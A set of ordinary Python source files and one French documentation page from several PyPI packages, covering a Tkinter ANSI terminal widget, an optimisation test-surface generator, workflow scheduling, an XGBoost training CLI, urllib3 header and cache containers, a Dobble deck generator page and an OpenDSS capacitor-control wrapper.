    through ``write`` and parsed by an ``ansi.AnsiParser`` whose hooks are
    bound to this frame's drawing methods.
    """

    def __init__(self, *args, **kw):
        """Set up fonts, the canvas, key bindings and the ANSI parser.

        Recognized keyword arguments: ``width``/``height`` (characters,
        default 80x25) and ``callback`` (required; called with each typed
        character or escape sequence).
        """
        global ttyFont, fontHeight, fontWidth
        # Fonts can only be created here (after Tk is initialized); this also
        # fills in the module-level metric placeholders.
        ttyFont = tkFont.Font(family = 'Courier', size = 10)
        fontWidth, fontHeight = max(map(ttyFont.measure, string.letters+string.digits)), int(ttyFont.metrics()['linespace'])
        self.width = kw.get('width', 80)
        self.height = kw.get('height', 25)
        self.callback = kw['callback']
        del kw['callback']
        # Convert the character geometry to pixels for the Frame/Canvas.
        kw['width'] = w = fontWidth * self.width
        kw['height'] = h = fontHeight * self.height
        Tkinter.Frame.__init__(self, *args, **kw)
        self.canvas = Tkinter.Canvas(bg='#000000', width=w, height=h)
        self.canvas.pack(side=Tkinter.TOP, fill=Tkinter.BOTH, expand=1)
        self.canvas.bind('<Key>', self.keyPressed)
        self.canvas.bind('<1>', lambda x: 'break')
        self.canvas.bind('<Up>', self.upPressed)
        self.canvas.bind('<Down>', self.downPressed)
        self.canvas.bind('<Left>', self.leftPressed)
        self.canvas.bind('<Right>', self.rightPressed)
        self.canvas.focus()
        # Route the parser's output hooks to our drawing methods.
        self.ansiParser = ansi.AnsiParser(ansi.ColorText.WHITE, ansi.ColorText.BLACK)
        self.ansiParser.writeString = self.writeString
        self.ansiParser.parseCursor = self.parseCursor
        self.ansiParser.parseErase = self.parseErase
        #for (a, b) in colorMap.items():
        #    self.canvas.tag_config(a, foreground=b)
        #    self.canvas.tag_config('b'+a, background=b)
        #self.canvas.tag_config('underline', underline=1)
        # Cursor position in character cells.
        self.x = 0
        self.y = 0
        self.cursor = self.canvas.create_rectangle(0,0,fontWidth-1,fontHeight-1,fill='green',outline='green')

    def _delete(self, sx, sy, ex, ey):
        """Remove all canvas items overlapping the character-cell rectangle
        (sx, sy)-(ex, ey)."""
        csx = sx*fontWidth + 1
        csy = sy*fontHeight + 1
        cex = ex*fontWidth + 3
        cey = ey*fontHeight + 3
        items = self.canvas.find_overlapping(csx,csy, cex,cey)
        for item in items:
            self.canvas.delete(item)

    def _write(self, ch, fg, bg):
        """Draw a single character at the cursor, wrapping and scrolling as
        needed, then advance the cursor one cell."""
        if self.x == self.width:
            # Wrap to the next line.
            self.x = 0
            self.y+=1
        if self.y == self.height:
            # Scroll the whole canvas up one row.
            [self.canvas.move(x,0,-fontHeight) for x in self.canvas.find_all()]
            self.y-=1
        canvasX = self.x*fontWidth + 1
        canvasY = self.y*fontHeight + 1
        # Clear whatever was previously drawn in this cell.
        items = self.canvas.find_overlapping(canvasX, canvasY, canvasX+2, canvasY+2)
        if items:
            [self.canvas.delete(item) for item in items]
        if bg:
            self.canvas.create_rectangle(canvasX, canvasY, canvasX+fontWidth-1, canvasY+fontHeight-1, fill=bg, outline=bg)
        self.canvas.create_text(canvasX, canvasY, anchor=Tkinter.NW, font=ttyFont, text=ch, fill=fg)
        self.x+=1

    def write(self, data):
        """Feed raw terminal output through the ANSI parser and redraw the
        cursor rectangle at the (possibly moved) cursor position."""
        #print self.x,self.y,repr(data)
        #if len(data)>5: raw_input()
        self.ansiParser.parseString(data)
        self.canvas.delete(self.cursor)
        canvasX = self.x*fontWidth + 1
        canvasY = self.y*fontHeight + 1
        self.cursor = self.canvas.create_rectangle(canvasX,canvasY,canvasX+fontWidth-1,canvasY+fontHeight-1, fill='green', outline='green')
        self.canvas.lower(self.cursor)

    def writeString(self, i):
        """Parser hook: render a colored text run ``i``, interpreting the
        control characters BEL, BS, TAB, LF and CR."""
        if not i.display:
            return
        fg = colorMap[i.fg]
        # 'b' (black) background is the canvas default, so skip drawing it.
        bg = i.bg != 'b' and colorMap[i.bg]
        for ch in i.text:
            b = ord(ch)
            if b == 7: # bell
                self.bell()
            elif b == 8: # BS
                if self.x:
                    self.x-=1
            elif b == 9: # TAB
                # NOTE(review): `i` here shadows the method argument
                # (harmless since `i` is not referenced again, but confusing).
                [self._write(' ',fg,bg) for i in range(8)]
            elif b == 10:
                # LF: scroll at the bottom row, otherwise move down.
                if self.y == self.height-1:
                    self._delete(0,0,self.width,0)
                    [self.canvas.move(x,0,-fontHeight) for x in self.canvas.find_all()]
                else:
                    self.y+=1
            elif b == 13:
                self.x = 0
            elif 32 <= b < 127:
                self._write(ch, fg, bg)

    def parseErase(self, erase):
        """Parser hook: handle an ANSI erase sequence ('J' screen, 'K' line,
        'P' delete-characters), with an optional numeric prefix."""
        if ';' in erase:
            # Multiple parameters: apply each one individually.
            end = erase[-1]
            parts = erase[:-1].split(';')
            [self.parseErase(x+end) for x in parts]
            return
        start = 0
        x,y = self.x, self.y
        if len(erase) > 1:
            start = int(erase[:-1])
        if erase[-1] == 'J':
            if start == 0:
                # Erase from cursor to end of screen.
                self._delete(x,y,self.width,self.height)
            else:
                # Erase the whole screen and home the cursor.
                self._delete(0,0,self.width,self.height)
                self.x = 0
                self.y = 0
        elif erase[-1] == 'K':
            if start == 0:
                # Erase from cursor to end of line.
                self._delete(x,y,self.width,y)
            elif start == 1:
                # Erase from start of line to cursor.
                self._delete(0,y,x,y)
                self.x = 0
            else:
                # Erase the whole line.
                self._delete(0,y,self.width,y)
                self.x = 0
        elif erase[-1] == 'P':
            self._delete(x,y,x+start,y)

    def parseCursor(self, cursor):
        """Parser hook: handle ANSI cursor-movement sequences
        ('C' right, 'D' left, 'd' row, 'G' column, 'H' absolute)."""
        #if ';' in cursor and cursor[-1]!='H':
        #    end = cursor[-1]
        #    parts = cursor[:-1].split(';')
        #    [self.parseCursor(x+end) for x in parts]
        #    return
        start = 1
        if len(cursor) > 1 and cursor[-1]!='H':
            start = int(cursor[:-1])
        if cursor[-1] == 'C':
            self.x+=start
        elif cursor[-1] == 'D':
            self.x-=start
        elif cursor[-1]=='d':
            self.y=start-1
        elif cursor[-1]=='G':
            self.x=start-1
        elif cursor[-1]=='H':
            if len(cursor)>1:
                # ANSI coordinates are 1-based row;column.
                y,x = map(int, cursor[:-1].split(';'))
                y-=1
                x-=1
            else:
                x,y=0,0
            self.x = x
            self.y = y

    def keyPressed(self, event):
        """Forward a printable keypress to the callback; 'break' stops Tk
        from handling the event further."""
        if self.callback and event.char:
            self.callback(event.char)
        return 'break'

    def upPressed(self, event):
        # VT100 application-mode cursor-up sequence.
        self.callback('\x1bOA')

    def downPressed(self, event):
        self.callback('\x1bOB')

    def rightPressed(self, event):
        self.callback('\x1bOC')

    def leftPressed(self, event):
        self.callback('\x1bOD')
|
PypiClean
|
/pviz-0.1.0rc15.tar.gz/pviz-0.1.0rc15/viz/generators/c2dtlz2.py
|
import numpy as np
from viz.generators import dtlz2
from viz.utils import transform as tr
__all__ = ["surface"]
def cvf(F):
    r"""Constraint-violation value of a single objective vector ``F``.

    A non-positive return value indicates that ``F`` satisfies the
    C2-DTLZ2 constraint; positive values measure the violation.
    """
    num_obj = F.shape[0]
    # Constraint radius depends on the number of objectives.
    if num_obj == 2:
        radius = 0.25
    elif num_obj == 3:
        radius = 0.4
    else:
        radius = 0.5
    half_radius = 0.50 * radius
    # Distance terms for the spheres centred at 1.0 on each objective axis.
    axis_terms = []
    for i in range(num_obj):
        rest = np.sum([(F[j] ** 2) for j in range(num_obj) if j != i])
        axis_terms.append(((F[i] - 1.0) ** 2) + rest - (radius ** 2.0))
    lhs = min(axis_terms)
    # Distance term for the sphere centred at (1/sqrt(m), ..., 1/sqrt(m)).
    rhs = np.sum([((f - (1.0 / (num_obj ** 0.5))) ** 2) for f in F]) - (half_radius ** 2)
    return min(lhs, rhs)
def get_feasible(F, X):
    r"""Keep only the feasible rows of ``F`` (and the matching rows of ``X``).

    The constraint function is evaluated on every row of ``F``; rows with a
    non-positive constraint-violation value are returned together with their
    design vectors and violation values.
    """
    violations = np.apply_along_axis(cvf, 1, F)
    feasible_idx = np.where(violations <= 0.0)[0]
    return F[feasible_idx], X[feasible_idx], violations[feasible_idx]
def surface(r=1, n=10, m=2, mode='lhc', **kwargs):
    r"""Generate `n` number of points on split `m`-sphere.
    The details of 'C2-DTLZ2' is described in [1]_.
    The radius of the `m`-sphere is specified in `r`. The point generation is
    currently done in two ways of random sampling -- Latin Hypercube (LHC) and
    LHC with normalization. Other ways will be added later. Points are first
    generated on the full DTLZ2 sphere and then filtered down to those that
    satisfy the C2-DTLZ2 constraint.
    Parameters
    ----------
    r : float, optional
        The radius of the sphere. Default 1 when optional.
    n : int, optional
        The total number of points sampled before the feasibility filter.
        Default 10 when optional.
    m : int, optional
        The dimension of the sphere. Default 2 when optional.
    mode : str, {'lhc', 'lhcl2', 'dd'}, optional
        If `mode = `lhc``, then LHC sampling will be used and points will be generated
        using standard spherical coordinate systems. If `mode = `lhcl2``, then we will
        use a normalized LHC sampling to generate uniformly distributed points on the
        sphere using the method described in [2]_. If 'mode = 'dd', then we will generate
        points using the subproblem decomposition technique used in NBI method
        (a.k.a. "Das-Dennis's Approach") discussed in [3]_. Default first when optional.
    Other Parameters
    ----------------
    delta : float, optional
        `delta` value for normalized LHC, this is used so that we only keep vectors
        `V` such that `np.linalg.norm(V, 1) > delta`. The default value is 0.0001 but
        you might want to change it according to your application.
    Returns
    -------
    F : ndarray
        The feasible points on the `m`-sphere, i.e. `|F| = n' x m` with `n' <= n`.
    X : ndarray
        The corresponding `m-1` dimensional spherical coordinate values,
        i.e. `|X| = n' x (m-1)`.
    G : ndarray
        The constraint-violation value of each feasible point (all `<= 0`).
    CV : ndarray
        The constraint values `G` normalized via `viz.utils.transform.normalize`.
    References
    ----------
    .. [1] H. Jain and K. Deb, "An Evolutionary Many-Objective Optimization Algorithm Using
        Reference-Point Based Nondominated Sorting Approach, Part II: Handling Constraints
        and Extending to an Adaptive Approach," in IEEE Transactions on Evolutionary Computation,
        vol. 18, no. 4, pp. 602-622, Aug. 2014, doi: 10.1109/TEVC.2013.2281534.
    .. [2] Simon C., "Generating uniformly distributed numbers on a sphere," online:
        http://corysimon.github.io/articles/uniformdistn-on-sphere/
    .. [3] I. Das and J. E. Dennis, "Normal-Boundary Intersection: A New Method for
        Generating the Pareto Surface in Nonlinear Multicriteria Optimization Problems,"
        SIAM Journal on Optimization, vol. 8, (3), pp. 631-27, 1998.
    """
    # This is needed for dtlz2
    delta = kwargs['delta'] if (len(kwargs) > 0 and 'delta' in kwargs) else 0.0001
    F, X = dtlz2.surface(r=r, n=n, m=m, mode=mode, delta=delta)
    # Drop the points that violate the C2-DTLZ2 constraint.
    F, X, G = get_feasible(F, X)
    CV = tr.normalize(G)
    return F, X, G, CV
|
PypiClean
|
/yadage-fork-0.11.0.tar.gz/yadage-fork-0.11.0/yadage/handlers/scheduler_handlers.py
|
import logging
import utils
import itertools
import copy
from expression_handlers import handlers as exprhandlers
from yadage.yadagestep import yadagestep, initstep, outputReference
from ..stages import jsonStage
from yadage.helpers import leaf_iterator
log = logging.getLogger(__name__)
# Registry of scheduler implementations plus the decorator used to register
# the stage handlers defined below.
handlers, scheduler = utils.handler_decorator()
# A scheduler does the following things:
#   - attaches new nodes to the DAG
#   - for each added step:
#       - the step is given a name
#       - the step attributes are determined using the scheduler spec and context
#       - a list of used inputs is tracked (in the form of [stepname,outputkey,index])
def select_parameter(wflowview, parameter):
    '''
    Evaluate a parameter definition against a workflow view.

    Plain (non-dict) values are returned unchanged; dict values are treated
    as value expressions and dispatched to the matching expression handler.

    :param wflowview: the workflow view on which to evaluate possible value expressions
    :param parameter: either a non-dict value or a JSON-like dict for a
                      supported value expression
    :return: the evaluated parameter value
    '''
    if type(parameter) is dict:
        handler = exprhandlers[parameter['expression_type']]
        return handler(wflowview, parameter)
    return parameter
def finalize_value(wflowview, step, value, state):
    '''
    Finalize a value by recursively resolving upstream references and
    contextualizing it for the passed state context.

    :param wflowview: the workflow view against which to resolve upstream references
    :param step: the step for which to track usage of upstream references
    :param value: the parameter value; may be an output reference or a JSON value type
    :param state: the state context used to contextualize parameter values
    :return: the finalized parameter value
    '''
    if type(value) == outputReference:
        # Record the upstream dependency, then resolve the referenced result
        # and finalize whatever it points at.
        step.used_input(value)
        resolved = value.pointer.resolve(wflowview.dag.getNode(value.stepid).result)
        return finalize_value(wflowview, step, resolved, state)
    return state.contextualize_data(value) if state else value
def finalize_input(wflowview, step, jsondata, state):
    '''
    Evaluate the final values of step parameters by resolving references to
    upstream outputs and contextualizing stateful parameters. Also tracks
    usage of upstream references for the step.

    :param wflowview: the workflow view against which to resolve any upstream references
    :param step: the step for which to track usage of upstream references
    :param jsondata: the prospective step parameters
    :param state: the state context
    :return: the finalized step parameters
    '''
    finalized = copy.deepcopy(jsondata)
    # Walk every leaf of the (possibly nested) parameter document and write
    # its finalized value into the copy.
    for pointer, raw_value in leaf_iterator(jsondata):
        pointer.set(finalized, finalize_value(wflowview, step, raw_value, state))
    return finalized
def step_or_init(name, spec, state_provider):
    '''
    Create a named yadagestep or a sub-workflow initstep based on the stage spec.

    :param name: name of the eventual (init-)step
    :param spec: the stage spec; either a 'step' or a 'workflow' entry selects the kind
    :param state_provider: the stage's state provider
    :return: a yadagestep or initstep object
    '''
    if 'step' in spec:
        # A concrete step gets its own state context derived from the provider.
        return yadagestep(name=name, spec=spec['step'], context=state_provider.new_state(name))
    if 'workflow' in spec:
        return initstep('init {}'.format(name))
def addStepOrWorkflow(name, stage, step, spec):
    '''
    Add a step, or a sub-workflow together with its init step, to the
    current workflow view.

    :param str name: the name of the step or sub-workflow
    :param stage: the stage from which to use state context and workflow view
    :param step: either a yadagestep (normal steps) or an initstep (sub-workflows)
    :param spec: the stage spec
    :return: None
    '''
    if type(step) != initstep:
        stage.addStep(step)
        return
    # Sub-workflow: build one jsonStage per nested stage under a fresh
    # state provider scoped to this name.
    provider = stage.state_provider.new_provider(name)
    substages = [jsonStage(stage_yml, provider) for stage_yml in spec['workflow']['stages']]
    stage.addWorkflow(substages, initstep=step)
def get_parameters(spec):
    '''
    Extract the stage parameters from the spec.

    :param spec: the stage spec, with a 'parameters' list of key/value entries
    :return: a JSON-like dict mapping parameter keys to their values
    '''
    parameters = {}
    for entry in spec['parameters']:
        parameters[entry['key']] = entry['value']
    return parameters
@scheduler('singlestep-stage')
def singlestep_stage(stage, spec):
    '''
    a simple stage that adds a single step/workflow. The node is attached
    to the DAG based on used upstream outputs
    :param stage: common stage parent object
    :param spec: stage JSON-like spec
    :return: None
    '''
    log.debug('scheduling singlestep stage with spec:\n%s', spec)
    step = step_or_init(name=stage.name, spec=spec, state_provider=stage.state_provider)
    # initsteps (sub-workflows) carry no state context of their own; fall
    # back to the stage's state provider for contextualizing parameters.
    ctx = step.context if hasattr(step, 'context') else stage.state_provider
    parameters = {
        k: select_parameter(stage.view, v) for k, v in get_parameters(spec).iteritems()
    }
    finalized = finalize_input(stage.view, step, parameters, ctx)
    addStepOrWorkflow(stage.name, stage, step.s(**finalized), spec)
def scatter(parameters, scatter):
    '''
    convert a parameter set and scatter definition into a list
    of single parameter sets.
    :param parameters: the parameter definition; scattered parameters must be lists
    :param scatter: scattering spec with 'parameters' (names to scatter over)
                    and 'method' (one of 'zip' or 'cartesian')
    :return: list of parameter sets, one per scheduled step
    '''
    commonpars = parameters.copy()
    # Split the scattered parameters off from the ones shared by every step.
    to_scatter = {}
    for scatpar in scatter['parameters']:
        to_scatter[scatpar] = commonpars.pop(scatpar)
    singlesteppars = []
    if scatter['method'] == 'zip':
        # Iterate the scattered parameter lists in lock-step.
        # (.items() works on both py2 and py3; the previous .iteritems()
        # call was py2-only and was wrapped in a no-op enumerate.)
        keys, zippable = zip(*to_scatter.items())
        for zipped in zip(*zippable):
            pars = commonpars.copy()
            pars.update(dict(zip(keys, zipped)))
            singlesteppars += [pars]
    if scatter['method'] == 'cartesian':
        # Full cartesian product, in the order the scatter spec lists
        # the parameters.
        for combo in itertools.product(*[to_scatter[k] for k in scatter['parameters']]):
            pars = commonpars.copy()
            pars.update(dict(zip(scatter['parameters'], combo)))
            singlesteppars += [pars]
    return singlesteppars
@scheduler('multistep-stage')
def multistep_stage(stage, spec):
    '''
    a stage that attaches an array of nodes to the DAG. The number of nodes
    is determined by a scattering recipe. Currently two algs are supported
    - ``zip``: one or more arrays of length n are iterated through in lock-step.
               n nodes are added to the DAG where the parameters values are set to
               the values in the iteration
    - ``cartesian``: a cartesian product of a number of arrays (possibly different sizes)
               adds n1 x n2 x ... nj nodes.
    Nodes are attached to the DAG based on used upstream inputs
    :param stage: common stage parent object
    :param spec: stage JSON-like spec
    :return: None
    '''
    log.debug('scheduling multistep stage with spec:\n%s', spec)
    parameters = {
        k: select_parameter(stage.view, v) for k, v in get_parameters(spec).iteritems()
    }
    # One parameter set per node to schedule.
    singlesteppars = scatter(parameters, spec['scatter'])
    for i, pars in enumerate(singlesteppars):
        # Each scheduled node gets an index-suffixed name.
        singlename = '{}_{}'.format(stage.name, i)
        step = step_or_init(name=singlename, spec=spec, state_provider = stage.state_provider)
        # NOTE(review): unlike singlestep_stage, the fallback context here is
        # None rather than stage.state_provider — confirm this is intentional.
        ctx = step.context if hasattr(step, 'context') else None
        finalized = finalize_input(stage.view, step, pars, ctx)
        addStepOrWorkflow(singlename, stage, step.s(**finalized), spec)
|
PypiClean
|
/autoxgbAUC-2.1.0.tar.gz/autoxgbAUC-2.1.0/src/xgbauto/cli/train.py
|
from argparse import ArgumentParser
from ..autoxgb import AutoXGB
from ..enums import TaskType
from . import BaseCommand
def train_autoxgb_command_factory(args):
    """Build a TrainAutoXGBCommand from the parsed CLI namespace *args*."""
    return TrainAutoXGBCommand(
        train_filename=args.train_filename,
        idx=args.idx,
        targets=args.targets,
        task=args.task,
        output=args.output,
        features=args.features,
        num_folds=args.num_folds,
        use_gpu=args.use_gpu,
        seed=args.seed,
        test_filename=args.test_filename,
        time_limit=args.time_limit,
        fast=args.fast,
    )
class TrainAutoXGBCommand(BaseCommand):
    """CLI command that trains a new model via AutoXGB.

    Registered as the ``train`` subcommand; collects the training options
    from the command line and forwards them to :class:`AutoXGB`.
    """

    @staticmethod
    def register_subcommand(parser: ArgumentParser):
        """Register the ``train`` subcommand and its options on *parser*."""
        _parser = parser.add_parser("train", help="Train a new model using AutoXGB")
        _parser.add_argument(
            "--train_filename",
            help="Path to training file",
            required=True,
            type=str,
        )
        _parser.add_argument(
            "--test_filename",
            help="Path to test file",
            required=False,
            type=str,
            default=None,
        )
        _parser.add_argument(
            "--output",
            help="Path to output directory",
            required=True,
            type=str,
        )
        _parser.add_argument(
            "--task",
            help="User defined task type",
            required=False,
            type=str,
            default=None,
            choices=TaskType.list_str(),
        )
        _parser.add_argument(
            "--idx",
            help="ID column",
            required=False,
            type=str,
            default="id",
        )
        _parser.add_argument(
            "--targets",
            help="Target column(s). If there are multiple targets, separate by ';'",
            required=False,
            type=str,
            default="target",
        )
        _parser.add_argument(
            "--num_folds",
            help="Number of folds to use",
            required=False,
            type=int,
            default=5,
        )
        _parser.add_argument(
            "--features",
            help="Features to use, separated by ';'",
            required=False,
            type=str,
            default=None,
        )
        _parser.add_argument(
            "--use_gpu",
            help="Whether to use GPU for training",
            action="store_true",
            required=False,
        )
        _parser.add_argument(
            "--fast",
            help="Whether to use fast mode for tuning params. Only one fold will be used if fast mode is set",
            action="store_true",
            required=False,
        )
        _parser.add_argument(
            "--seed",
            help="Random seed",
            required=False,
            type=int,
            default=42,
        )
        _parser.add_argument(
            "--time_limit",
            help="Time limit for optimization",
            required=False,
            type=int,
            default=None,
        )
        # Route parsed args through the factory so `args.func(args)` builds
        # an instance of this command.
        _parser.set_defaults(func=train_autoxgb_command_factory)

    def __init__(
        self,
        train_filename,
        idx,
        targets,
        task,
        output,
        features,
        num_folds,
        use_gpu,
        seed,
        test_filename,
        time_limit,
        fast,
    ):
        """Store the parsed CLI options.

        ``targets`` and ``features`` arrive as ';'-separated strings and are
        split into lists here (``features`` may be None).
        """
        self.train_filename = train_filename
        self.idx = idx
        self.targets = targets.split(";")
        self.task = task
        self.output = output
        self.features = features.split(";") if features else None
        self.num_folds = num_folds
        self.use_gpu = use_gpu
        self.seed = seed
        self.test_filename = test_filename
        self.time_limit = time_limit
        self.fast = fast

    def execute(self):
        """Instantiate AutoXGB with the stored options and run training."""
        axgb = AutoXGB(
            train_filename=self.train_filename,
            idx=self.idx,
            targets=self.targets,
            task=self.task,
            output=self.output,
            features=self.features,
            num_folds=self.num_folds,
            use_gpu=self.use_gpu,
            seed=self.seed,
            test_filename=self.test_filename,
            time_limit=self.time_limit,
            fast=self.fast,
        )
        axgb.train()
|
PypiClean
|
/yieldfrom.urllib3-0.1.4.zip/yieldfrom.urllib3-0.1.4/yieldfrom/urllib3/_collections.py
|
from collections import Mapping, MutableMapping
try:
from threading import RLock
except ImportError: # Platform-specific: No threads available
class RLock:
def __enter__(self):
pass
def __exit__(self, exc_type, exc_value, traceback):
pass
try: # Python 2.7+
from collections import OrderedDict
except ImportError:
from .packages.ordered_dict import OrderedDict
from .packages.six import itervalues
__all__ = ['RecentlyUsedContainer', 'HTTPHeaderDict']

# Sentinel distinguishing "no value stored" from a stored None.
_Null = object()
class RecentlyUsedContainer(MutableMapping):
    """
    Provides a thread-safe dict-like container which maintains up to
    ``maxsize`` keys while throwing away the least-recently-used keys beyond
    ``maxsize``.
    :param maxsize:
        Maximum number of recent elements to retain.
    :param dispose_func:
        Every time an item is evicted from the container,
        ``dispose_func(value)`` is called.
    """

    # Backing store; OrderedDict gives the eviction order (oldest first).
    ContainerCls = OrderedDict

    def __init__(self, maxsize=10, dispose_func=None):
        self._maxsize = maxsize
        self.dispose_func = dispose_func
        self._container = self.ContainerCls()
        self.lock = RLock()

    def __getitem__(self, key):
        # Re-insert the item, moving it to the end of the eviction line.
        with self.lock:
            item = self._container.pop(key)
            self._container[key] = item
            return item

    def __setitem__(self, key, value):
        evicted_value = _Null
        with self.lock:
            # Possibly evict the existing value of 'key'
            evicted_value = self._container.get(key, _Null)
            self._container[key] = value
            # If we didn't evict an existing value, we might have to evict the
            # least recently used item from the beginning of the container.
            if len(self._container) > self._maxsize:
                _key, evicted_value = self._container.popitem(last=False)
        # Dispose outside the lock so a slow callback can't block other threads.
        if self.dispose_func and evicted_value is not _Null:
            self.dispose_func(evicted_value)

    def __delitem__(self, key):
        with self.lock:
            value = self._container.pop(key)
        if self.dispose_func:
            self.dispose_func(value)

    def __len__(self):
        with self.lock:
            return len(self._container)

    def __iter__(self):
        # No safe way to iterate while other threads mutate the container.
        raise NotImplementedError('Iteration over this class is unlikely to be threadsafe.')

    def clear(self):
        """Remove all items, calling ``dispose_func`` on each stored value."""
        with self.lock:
            # Copy pointers to all values, then wipe the mapping
            # under Python 2, this copies the list of values twice :-|
            values = list(self._container.values())
            self._container.clear()
        if self.dispose_func:
            for value in values:
                self.dispose_func(value)

    def keys(self):
        """Return the container's keys (snapshot taken under the lock)."""
        with self.lock:
            return self._container.keys()
class HTTPHeaderDict(MutableMapping):
    """
    :param headers:
        An iterable of field-value pairs. Must not contain multiple field names
        when compared case-insensitively.
    :param kwargs:
        Additional field-value pairs to pass in to ``dict.update``.
    A ``dict`` like container for storing HTTP Headers.
    Field names are stored and compared case-insensitively in compliance with
    RFC 7230. Iteration provides the first case-sensitive key seen for each
    case-insensitive pair.
    Using ``__setitem__`` syntax overwrites fields that compare equal
    case-insensitively in order to maintain ``dict``'s api. For fields that
    compare equal, instead create a new ``HTTPHeaderDict`` and use ``.add``
    in a loop.
    If multiple fields that are equal case-insensitively are passed to the
    constructor or ``.update``, the behavior is undefined and some will be
    lost.
    >>> headers = HTTPHeaderDict()
    >>> headers.add('Set-Cookie', 'foo=bar')
    >>> headers.add('set-cookie', 'baz=quxx')
    >>> headers['content-length'] = '7'
    >>> headers['SET-cookie']
    'foo=bar, baz=quxx'
    >>> headers['Content-Length']
    '7'
    If you want to access the raw headers with their original casing
    for debugging purposes you can access the private ``._data`` attribute
    which is a normal python ``dict`` that maps the case-insensitive key to a
    list of tuples stored as (case-sensitive-original-name, value). Using the
    structure from above as our example:
    >>> headers._data
    {'set-cookie': [('Set-Cookie', 'foo=bar'), ('set-cookie', 'baz=quxx')],
    'content-length': [('content-length', '7')]}
    """

    def __init__(self, headers=None, **kwargs):
        # lowercase field name -> list of (original-cased name, value) tuples
        self._data = {}
        if headers is None:
            headers = {}
        self.update(headers, **kwargs)

    def add(self, key, value):
        """Adds a (name, value) pair, doesn't overwrite the value if it already
        exists.
        >>> headers = HTTPHeaderDict(foo='bar')
        >>> headers.add('Foo', 'baz')
        >>> headers['foo']
        'bar, baz'
        """
        self._data.setdefault(key.lower(), []).append((key, value))

    def getlist(self, key):
        """Returns a list of all the values for the named field. Returns an
        empty list if the key doesn't exist."""
        return self[key].split(', ') if key in self else []

    def copy(self):
        """Return a new HTTPHeaderDict preserving every raw (name, value) pair."""
        h = HTTPHeaderDict()
        for key in self._data:
            for rawkey, value in self._data[key]:
                h.add(rawkey, value)
        return h

    def __eq__(self, other):
        # Equal when the case-insensitively keyed, joined values match.
        if not isinstance(other, Mapping):
            return False
        other = HTTPHeaderDict(other)
        return dict((k1, self[k1]) for k1 in self._data) == \
            dict((k2, other[k2]) for k2 in other._data)

    def __getitem__(self, key):
        # Multiple stored values for a field are joined with ', '.
        values = self._data[key.lower()]
        return ', '.join(value[1] for value in values)

    def __setitem__(self, key, value):
        # Overwrites all previously stored values for this field.
        self._data[key.lower()] = [(key, value)]

    def __delitem__(self, key):
        del self._data[key.lower()]

    def __len__(self):
        return len(self._data)

    def __iter__(self):
        # Yield the first original-cased name seen for each field.
        for headers in itervalues(self._data):
            yield headers[0][0]

    def __repr__(self):
        return '%s(%r)' % (self.__class__.__name__, dict(self.items()))
|
PypiClean
|
/Jouets-0.2.0.tar.gz/Jouets-0.2.0/doc/dobble.rst
|
..
Copyright 2014-2015 Louis Paternault
Cette œuvre de Louis Paternault est mise à disposition selon les termes de
la licence Creative Commons Attribution - Partage dans les Mêmes Conditions
4.0 International (CC-BY-SA). Le texte complet de la licence est disponible
à l'adresse : http://creativecommons.org/licenses/by-sa/4.0/deed.fr
************************************************
`dobble` — Création de jeu de cartes de *Dobble*
************************************************
Le `Dobble <http://www.asmodee.com/ressources/jeux_versions/dobble.php>`__ est
un jeu de société de rapidité, dont les règles s'expliquent en moins de vingt
secondes (sans exagérer). Il se compose de 55 cartes comportant chacune huit
symboles, ayant la particularité suivante : deux cartes quelconques ont
exactement un symbole en commun (ni plus ni moins).
La question qui se pose immédiatement est : comment créer un tel jeu de
cartes ? L'analyse mathématique, et la description de l'algorithme, sont
proposées dans la partie :ref:`dobble_math`.
Ce programme permet de générer des jeux de cartes, de taille arbitrairement
grande (mais pas arbitraire pour autant), et de vérifier qu'un jeu donné est
correct.
Table des matières
------------------
La première partie :ref:`dobble_math` propose une analyse mathématique du jeu,
ainsi qu'une description et preuve de l'algorithme. La seconde partie
:ref:`dobble_variantes` contient l'analyse mathématique de deux variantes
possibles à ce jeu. La dernière, :ref:`dobble_usage`, enfin, décrit
l'utilisation du programme en lui-même.
.. toctree::
:maxdepth: 2
:numbered:
dobble/math
dobble/variantes
dobble/usage
Autres analyses
---------------
L'analyse semblant faire référence sur internet est proposée par Maxime
Bourrigan (du CNRS) : `Dobble et la géométrie finie
<http://images.math.cnrs.fr/Dobble-et-la-geometrie-finie.html>`_. Dans cet
article, l'auteur utilise une approche géométrique pour étudier ce jeu, mais
sans proposer d'algorithme pour générer de jeu.
Bourrigan apporte une information très intéressante concernant ce genre de
problèmes : l'ensemble des configurations possibles est mal connu, et
l'existence d'un jeu à 157 cartes (ayant chacune 13 symboles) est un problème
ouvert.
Notre proposition, quant à elle, utilise une approche arithmétique. Je ne suis
pas le premier à découvrir la méthode que je propose ici : une rapide recherche
de `math dobble` sur votre moteur de recherche préféré vous donnera d'autres
exemples. Les cas de découvertes simultanées sont monnaie courante en sciences,
et je suppose que l'aspect mathématique de ce jeu a été perçu par de nombreux
joueurs, qui ont alors joué à en étudier les propriétés.
|
PypiClean
|
/py_dss_interface-2.0.2-py3-none-any.whl/py_dss_interface/models/CapControls/CapControls.py
|
from typing import List
from py_dss_interface.models.CapControls.CapControlsF import CapControlsF
from py_dss_interface.models.CapControls.CapControlsI import CapControlsI
from py_dss_interface.models.CapControls.CapControlsS import CapControlsS
from py_dss_interface.models.CapControls.CapControlsV import CapControlsV
class CapControls(CapControlsF, CapControlsI, CapControlsS, CapControlsV):
    """
    This interface implements the CapControls (ICapControls) interface of OpenDSS by declaring 4 procedures for
    accessing the different properties included in this interface: CapControlsF, CapControlsI, CapControlsS,
    CapControlsV.
    """

    def __init__(self, obj_dss):
        super().__init__(obj_dss)

    @property
    def mode(self) -> int:
        """Gets/sets the type of automatic controller (see manual for details).

        Read mapping (controller type -> int), as copied from the upstream source:
            CURRENTCONTROL: 0
            VOLTAGECONTROL: 1
            VARCONTROL: 2
            TIMECONTROL: 3
            PFCONTROL: 4
            USERCONTROL: 4

        NOTE(review): USERCONTROL reads back as 4, the same code as PFCONTROL
        (this duplication comes from the upstream listing) -- confirm intended.

        Write mapping (int -> controller type):
            0: CURRENTCONTROL
            1: VOLTAGECONTROL
            2: KVARCONTROL
            3: TIMECONTROL
            4: PFCONTROL
        """
        return CapControlsI._mode(self)

    @mode.setter
    def mode(self, argument: int):
        CapControlsI._mode_write(self, argument)

    @property
    def monitored_term(self) -> int:
        """Gets/sets the terminal number on the element that the PT and CT are connected to.

        There is no explicit return type in the official documentation, so
        nothing beyond ``int`` is asserted here.
        """
        return CapControlsI._monitored_term(self)

    @monitored_term.setter
    def monitored_term(self, values):
        # NOTE(review): unlike the other setters, this one expects a
